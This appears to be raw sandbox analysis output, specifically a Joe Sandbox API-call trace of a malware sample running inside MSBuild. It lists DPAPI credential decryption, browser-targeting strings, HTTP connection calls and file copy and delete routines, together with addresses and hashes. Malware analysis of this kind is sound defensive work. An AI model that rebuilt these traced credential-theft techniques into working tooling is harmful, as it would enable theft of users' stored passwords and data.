                                                                                                                                                                                                                                                                              • Part of subcall function 0040FEB0: lstrlen.KERNEL32(00418579,?,00000000,?,00417CAD,00427387,00427386,00000000,?,00000000,00422CB8,000000FF,?,00418579), ref: 0040FEBB
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FEB0: lstrcpy.KERNEL32(00000000,00418579), ref: 0040FEF2
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                            • SetEnvironmentVariableA.KERNEL32(00E39770,00000000,00000000,?,0040BCD3,TjB,00426A54,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00426A4F,?,?,?,00000000,00420210,000000FF), ref: 0040732E
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00E393B8,?,?,?,00000000,00420210,000000FF,?,0040BCD3), ref: 00407346
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • TjB, xrefs: 004072DA, 00407312, 004072DD
                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004072A6, 004072C4
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                                                                                                            • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;$TjB
                                                                                                                                                                                                                                                                            • API String ID: 2929475105-3266114336
                                                                                                                                                                                                                                                                            • Opcode ID: 3c6253b2ee137306e5b69380abe9ad6fab02b1930fa2895b56db71eb43332c6a
                                                                                                                                                                                                                                                                            • Instruction ID: ef5f06d785e981839736ef054ac1c91612f0bbff260fa06a83a8b7e256dd51d8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c6253b2ee137306e5b69380abe9ad6fab02b1930fa2895b56db71eb43332c6a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17416E70900615EFC720EFA4ED45EAA7BBAEB48B00F10553EF501A32E1DB786945CBA5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8,00422591,PdA,?,?,?,00000001), ref: 004154A5
                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00413E10,?,00000000,00000000), ref: 004154C6
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004154D2
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                                                                                                                                                                            • String ID: PdA$PdA
                                                                                                                                                                                                                                                                            • API String ID: 4198075804-199869184
                                                                                                                                                                                                                                                                            • Opcode ID: 89743936c7e81fd25222ad337d46cbc68b71f87488163e74c6bc97f1d91e7fef
                                                                                                                                                                                                                                                                            • Instruction ID: 58f52d09a55b75ac7dcb790bb2502d5d97770f71d094898c51def8a770c609ef
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 89743936c7e81fd25222ad337d46cbc68b71f87488163e74c6bc97f1d91e7fef
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB416F34800248EECB11DFE5C941BDDBBB5AF19308F50807EE906632D2DB782B48CBA5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FEB0: lstrlen.KERNEL32(00418579,?,00000000,?,00417CAD,00427387,00427386,00000000,?,00000000,00422CB8,000000FF,?,00418579), ref: 0040FEBB
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FEB0: lstrcpy.KERNEL32(00000000,00418579), ref: 0040FEF2
                                                                                                                                                                                                                                                                              • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,00E33C78), ref: 004188F5
                                                                                                                                                                                                                                                                              • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,00E33BD8), ref: 0041890D
                                                                                                                                                                                                                                                                              • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,00E372C0), ref: 00418926
                                                                                                                                                                                                                                                                              • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,00E37338), ref: 0041893E
                                                                                                                                                                                                                                                                              • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,00E372D8), ref: 00418956
                                                                                                                                                                                                                                                                              • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,00E37278), ref: 0041896F
                                                                                                                                                                                                                                                                              • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,00E30D98), ref: 00418987
                                                                                                                                                                                                                                                                              • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,00E37308), ref: 0041899F
                                                                                                                                                                                                                                                                              • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,00E37320), ref: 004189B8
                                                                                                                                                                                                                                                                              • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,00E37290), ref: 004189D0
                                                                                                                                                                                                                                                                              • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,00E372A8), ref: 004189E8
                                                                                                                                                                                                                                                                              • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,00E33C58), ref: 00418A01
                                                                                                                                                                                                                                                                              • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,00E33A78), ref: 00418A19
                                                                                                                                                                                                                                                                              • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,00E33998), ref: 00418A31
                                                                                                                                                                                                                                                                              • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,00E33AB8), ref: 00418A4A
                                                                                                                                                                                                                                                                              • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,00E37128), ref: 00418A62
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00417EB0
                                                                                                                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00417EC7
                                                                                                                                                                                                                                                                              • Part of subcall function 00410D30: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410D68
                                                                                                                                                                                                                                                                              • Part of subcall function 00410D30: GetVolumeInformationA.KERNEL32(00421A29,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410DA1
                                                                                                                                                                                                                                                                              • Part of subcall function 00410D30: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410DED
                                                                                                                                                                                                                                                                              • Part of subcall function 00410D30: HeapAlloc.KERNEL32(00000000), ref: 00410DF4
                                                                                                                                                                                                                                                                              • Part of subcall function 00404500: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004045CA
                                                                                                                                                                                                                                                                              • Part of subcall function 00404500: StrCmpCA.SHLWAPI(?,00E39A60,?,?,?,?,?,?,00000000), ref: 004045EA
                                                                                                                                                                                                                                                                              • Part of subcall function 004127A0: StrCmpCA.SHLWAPI(00000000,block,00000000,?,00417F3E), ref: 004127D8
                                                                                                                                                                                                                                                                              • Part of subcall function 004127A0: ExitProcess.KERNEL32 ref: 004127E3
                                                                                                                                                                                                                                                                              • Part of subcall function 00405CE0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405DAA
                                                                                                                                                                                                                                                                              • Part of subcall function 00405CE0: StrCmpCA.SHLWAPI(?,00E39A60,?,?,?,?,?,?,00000000), ref: 00405DCA
                                                                                                                                                                                                                                                                              • Part of subcall function 00412220: strtok_s.MSVCRT ref: 00412260
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 004182B7
                                                                                                                                                                                                                                                                              • Part of subcall function 00405CE0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405F54
                                                                                                                                                                                                                                                                              • Part of subcall function 004135C0: strtok_s.MSVCRT ref: 004135FE
                                                                                                                                                                                                                                                                              • Part of subcall function 004135C0: strtok_s.MSVCRT ref: 004136C1
                                                                                                                                                                                                                                                                              • Part of subcall function 00411D10: memset.MSVCRT ref: 00411D4B
                                                                                                                                                                                                                                                                              • Part of subcall function 00405CE0: HttpOpenRequestA.WININET(00000000,00E39900,?,00E39E50,00000000,00000000,-00400100,00000000), ref: 00405F94
                                                                                                                                                                                                                                                                              • Part of subcall function 00405CE0: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405FBB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressProc$Internetlstrcpy$Open$strtok_s$HeapProcesslstrcatlstrlen$AllocConnectDirectoryExitHttpInformationOptionRequestSleepVolumeWindowsmemset
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3722462685-3916222277
                                                                                                                                                                                                                                                                            • Opcode ID: 12271ea2f4504a68fc960b10ed437e8ad1c9084cbdc0ba69338d80f575c8c776
                                                                                                                                                                                                                                                                            • Instruction ID: af4e92580bc7232f15382c81446c557bbd7ea1f76374bafb1c2556823289d0db
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 12271ea2f4504a68fc960b10ed437e8ad1c9084cbdc0ba69338d80f575c8c776
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84329870D00358AACF10EBA5CD46BDDBB75AF19704F5441AEF50873282DB781B48CBA6
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetSystemInfo.KERNEL32(?), ref: 6CACC947
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6CACC969
                                                                                                                                                                                                                                                                            • GetSystemInfo.KERNEL32(?), ref: 6CACC9A9
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6CACC9C8
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6CACC9E2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Virtual$AllocInfoSystem$Free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4191843772-0
                                                                                                                                                                                                                                                                            • Opcode ID: 1a4c0aa6113f6a3ff5ce9e0a6111f6b797bbdafbffe53bf25980b634c84ac019
                                                                                                                                                                                                                                                                            • Instruction ID: aee38c62587c56b532d8e8e67f91d8dc2e4fd111d888452f3a48b54106d735c0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1a4c0aa6113f6a3ff5ce9e0a6111f6b797bbdafbffe53bf25980b634c84ac019
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58215131741628ABDB15AB68DC88BAE7779FF46708F50051EF90BA7B80DB305C848791
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00427AB4,00000000,00000001,00427260,?,00000001,00000001,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?), ref: 00410F8D
                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00410F9C
                                                                                                                                                                                                                                                                            • _wtoi64.MSVCRT ref: 00410FE2
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 00410FF8
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00410FFB
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$Free$AllocCreateInstance_wtoi64
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1817501562-0
                                                                                                                                                                                                                                                                            • Opcode ID: 99efa5cf341d0c5a4f536511f82e5ceebee3ff228c9a1ec95ae9d6f44b693dba
                                                                                                                                                                                                                                                                            • Instruction ID: f339f683a09679795ac17ff9659d8e63658d8b914be92c526fb569d364882cc1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 99efa5cf341d0c5a4f536511f82e5ceebee3ff228c9a1ec95ae9d6f44b693dba
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB118175700118AFC720DFA9CC85EAABBB9EFC9704B1081AAF905C7310D675EE42CB60
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004104E5
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004104EC
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,00E306D8,00000000,00020119,00000000), ref: 0041050B
                                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(00000000,00E39238,00000000,00000000,00000000,000000FF), ref: 00410526
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00410530
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3466090806-0
                                                                                                                                                                                                                                                                            • Opcode ID: 5e6d39d117e0467e1ea244c9ca8b316610d55b9159fd229541649f6d9304fad4
                                                                                                                                                                                                                                                                            • Instruction ID: 676a6382b8ff66aaa777a0d0020f05f931ed1f937911e77e191903498250bf3d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e6d39d117e0467e1ea244c9ca8b316610d55b9159fd229541649f6d9304fad4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 92F04FB9640218FFE710DBA0EC49FAB7B7EEB49B01F005159FB0597240D6705900CBA0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 0l@$0l@$0l@
                                                                                                                                                                                                                                                                            • API String ID: 0-278002525
                                                                                                                                                                                                                                                                            • Opcode ID: d9fc23f20392344533ef2d983e31f0e7033ca9f6a2f3c0fdbc76c7e886b2572f
                                                                                                                                                                                                                                                                            • Instruction ID: 1a87c9e28315db84159d1825db7685bd73dc57595dfdda9b1935a5cd357ea1c2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d9fc23f20392344533ef2d983e31f0e7033ca9f6a2f3c0fdbc76c7e886b2572f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 394192B1E002159BEB14DF5AD941AAFB7B8EF84314F01847AEC09A7391E738DD508BA5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                              • Part of subcall function 00411450: GetSystemTime.KERNEL32(?,00E300C0,00427270,?,00000000,00000008,?,?,00000000,00421AA1,000000FF,?,0040460E,0041FDC9,00000014), ref: 004114A5
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A227
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 0040A40B
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 0040A41F
                                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 0040A4A1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 211194620-0
                                                                                                                                                                                                                                                                            • Opcode ID: 667ad3b203bf6fc85cf3e4c277fb277ffb9b7896b2c50844c84a4a1de004fd4d
                                                                                                                                                                                                                                                                            • Instruction ID: b59fb0c15770b26fa6eb1e59df2b1821273456b1948b1926dc15d3532991443d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 667ad3b203bf6fc85cf3e4c277fb277ffb9b7896b2c50844c84a4a1de004fd4d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4B18070801248EACB14EBE4D955BEDBB79AF29304F54417EE502732D2DB782B0DCBA5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                              • Part of subcall function 00406E80: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000), ref: 00406EB7
                                                                                                                                                                                                                                                                              • Part of subcall function 00406E80: GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406ECD
                                                                                                                                                                                                                                                                              • Part of subcall function 00406E80: LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406EE8
                                                                                                                                                                                                                                                                              • Part of subcall function 00406E80: ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F01
                                                                                                                                                                                                                                                                              • Part of subcall function 00406E80: CloseHandle.KERNEL32(00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F29
                                                                                                                                                                                                                                                                              • Part of subcall function 004116D0: LocalAlloc.KERNEL32(00000040,?,?,00000001,00000004,?,00413C40,00000000,00000000), ref: 004116EC
                                                                                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,00E38BE0,?,?,?,?,?,?,?,?,?,?,?,00421750,?), ref: 0040CE4B
                                                                                                                                                                                                                                                                              • Part of subcall function 00406F50: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004064DB,00000000,00000000), ref: 00406F77
                                                                                                                                                                                                                                                                              • Part of subcall function 00406F50: LocalAlloc.KERNEL32(00000040,00000000,?,004064DB,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406F86
                                                                                                                                                                                                                                                                              • Part of subcall function 00406F50: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004064DB,00000000,00000000), ref: 00406F9D
                                                                                                                                                                                                                                                                              • Part of subcall function 00406F50: LocalFree.KERNEL32(?,?,004064DB,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406FAC
                                                                                                                                                                                                                                                                            • memcmp.MSVCRT ref: 0040CE89
                                                                                                                                                                                                                                                                              • Part of subcall function 00406FD0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406FF5
                                                                                                                                                                                                                                                                              • Part of subcall function 00406FD0: LocalAlloc.KERNEL32(00000040,?,?), ref: 0040700D
                                                                                                                                                                                                                                                                              • Part of subcall function 00406FD0: LocalFree.KERNEL32(?), ref: 0040702E
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
                                                                                                                                                                                                                                                                            • String ID: $DPAPI
                                                                                                                                                                                                                                                                            • API String ID: 512175977-1819349886
                                                                                                                                                                                                                                                                            • Opcode ID: e57edee3f3d7b817aeb0e109a879f4908534b96d8f8cc706ab0346b101acb06e
                                                                                                                                                                                                                                                                            • Instruction ID: 756776268f3a410f8ea97ed2d03368a249db7ca66dc35e5b071a325b4266dc37
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e57edee3f3d7b817aeb0e109a879f4908534b96d8f8cc706ab0346b101acb06e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D431B4B1D00109ABDB10DB95DC42BEFB77AEB44314F14462AF905B32D1E738A90587E6
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,Opera GX,00426AD3,00426AD2,?,?), ref: 0040E34D
                                                                                                                                                                                                                                                                              • Part of subcall function 00411670: SHGetFolderPathA.SHELL32(00000000,.kB,00000000,00000000,?,00000000), ref: 004116A8
